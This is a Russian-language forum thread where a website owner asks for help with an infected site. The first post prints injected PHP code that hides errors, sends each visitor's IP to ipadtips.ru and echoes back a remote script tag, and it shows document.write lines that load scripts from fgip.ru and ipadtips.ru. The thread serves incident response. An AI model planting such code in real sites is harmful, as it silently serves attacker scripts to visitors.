Показано с 1 по 3 из 3.

Заражен сайт

  1. #1
    Junior Member (OID) Репутация
    Регистрация
    22.04.2014
    Сообщений
    1
    Вес репутации
    14

    Заражен сайт

    В одной из директорий появился файл (прикреплен).в файлах появился
    PHP код:
    <?php
    #d308d9#
    if (empty($tey)) {
        
    error_reporting(0);
        @
    ini_set('display_errors'0);
        if (!
    function_exists('__url_get_contents')) {
            function 
    __url_get_contents($remote_url$timeout)
            {
                if (
    function_exists('curl_exec')) {
                    
    $ch curl_init();
                    
    curl_setopt($chCURLOPT_URL$remote_url);
                    
    curl_setopt($chCURLOPT_RETURNTRANSFERtrue);
                    
    curl_setopt($chCURLOPT_CONNECTTIMEOUT$timeout);
                    
    curl_setopt($chCURLOPT_TIMEOUT$timeout); //timeout in seconds
                    
    $_url_get_contents_data curl_exec($ch);
                    
    curl_close($ch);
                } elseif (
    function_exists('file_get_contents') && ini_get('allow_url_fopen')) {
                    
    $ctx = @stream_context_create(array('http' =>
                        array(
                            
    'timeout' => $timeout,
                        )
                    ));
                    
    $_url_get_contents_data = @file_get_contents($remote_urlfalse$ctx);
                } elseif (
    function_exists('fopen') && function_exists('stream_get_contents')) {
                    
    $handle = @fopen($remote_url"r");
                    
    $_url_get_contents_data = @stream_get_contents($handle);
                } else {
                    
    $_url_get_contents_data __file_get_url_contents($remote_url);
                }
                return 
    $_url_get_contents_data;
            }
        }
        if (!
    function_exists('__file_get_url_contents')) {
            function 
    __file_get_url_contents($remote_url)
            {
                if (
    preg_match('/^([a-z]+):\/\/([a-z0-9-.]+)(\/.*$)/i',
                    
    $remote_url$matches)
                ) {
                    
    $protocol strtolower($matches[1]);
                    
    $host $matches[2];
                    
    $path $matches[3];
                } else {
                    
    // Bad remote_url-format
                    
    return FALSE;
                }
                if (
    $protocol == "http") {
                    
    $socket = @fsockopen($host80$errno$errstr$timeout);
                } else {
                    
    // Bad protocol
                    
    return FALSE;
                }
                if (!
    $socket) {
                    
    // Error creating socket
                    
    return FALSE;
                }
                
    $request "GET $path HTTP/1.0\r\nHost: $host\r\n\r\n";
                
    $len_written = @fwrite($socket$request);
                if (
    $len_written === FALSE || $len_written != strlen($request)) {
                    
    // Error sending request
                    
    return FALSE;
                }
                
    $response "";
                while (!@
    feof($socket) &&
                    (
    $buf = @fread($socket4096)) !== FALSE) {
                    
    $response .= $buf;
                }
                if (
    $buf === FALSE) {
                    
    // Error reading response
                    
    return FALSE;
                }
                
    $end_of_header strpos($response"\r\n\r\n");
                return 
    substr($response$end_of_header 4);
            }
        }

        if (empty(
    $__var_to_echo) && empty($remote_domain)) {
            
    $_ip $_SERVER['REMOTE_ADDR'];
            
    $tey "http://ipadtips.ru/pbPfWrqX.php";
            
    $tey __url_get_contents($tey."?a=$_ip"1);
            if (
    strpos($tey'http://') === 0) {
                
    $__var_to_echo '<script type="text/javascript" src="' $tey '?id=1331703"></script>';
                echo 
    $__var_to_echo;
            }
        }
    }
    #/d308d9#
    ?>
    Во всех js файлах появилась строка
    PHP код:
    /*f827eb*/
    document.write('<script type="text/javascript" src="http://fgip.ru/xcgFmDy4.php?id=1331712"></script>');

    /*/f827eb*/ 
    или
    PHP код:
    /*88137e*/
    document.write('<script type="text/javascript" src="http://ipadtips.ru/pbPfWrqX.php?id=1331705"></script>');

    /*/88137e*/ 

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Cyber Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Info_bot
    Регистрация
    11.05.2011
    Сообщений
    2,458
    Вес репутации
    341
    Уважаемый(ая) werd wer, спасибо за обращение на наш форум!

    Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитами АВЗ и HiJackThis, подробнее можно прочитать в правилах оформления запроса о помощи.

    Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

  4. #3
    Невымерший Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для thyrex
    Регистрация
    07.03.2009
    Адрес
    Soligorsk, Belarus
    Сообщений
    96,245
    Вес репутации
    3015
    Microsoft MVP 2012-2016 Consumer Security
    Microsoft MVP 2016 Reconnect

Похожие темы

  1. заражен сайт
    От Иван Юндев в разделе Лечение и защита сайтов от вирусов
    Ответов: 1
    Последнее сообщение: 13.01.2013, 15:27
  2. VBS Malware-gen - заражен сайт
    От s_linar в разделе Лечение и защита сайтов от вирусов
    Ответов: 2
    Последнее сообщение: 30.10.2012, 00:10
  3. Заражен сайт - ubuntologia.ru
    От zeroed в разделе Помогите!
    Ответов: 2
    Последнее сообщение: 08.06.2012, 21:10
  4. сайт техносилы заражен #2
    От Revive444 в разделе Помогите!
    Ответов: 1
    Последнее сообщение: 01.07.2008, 00:41
  5. сайт техносилы заражен
    От Revive444 в разделе Помогите!
    Ответов: 4
    Последнее сообщение: 30.06.2008, 23:53

Метки для этой темы

Свернуть/Развернуть Ваши права в разделе

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  
Page generated in 0.00076 seconds with 16 queries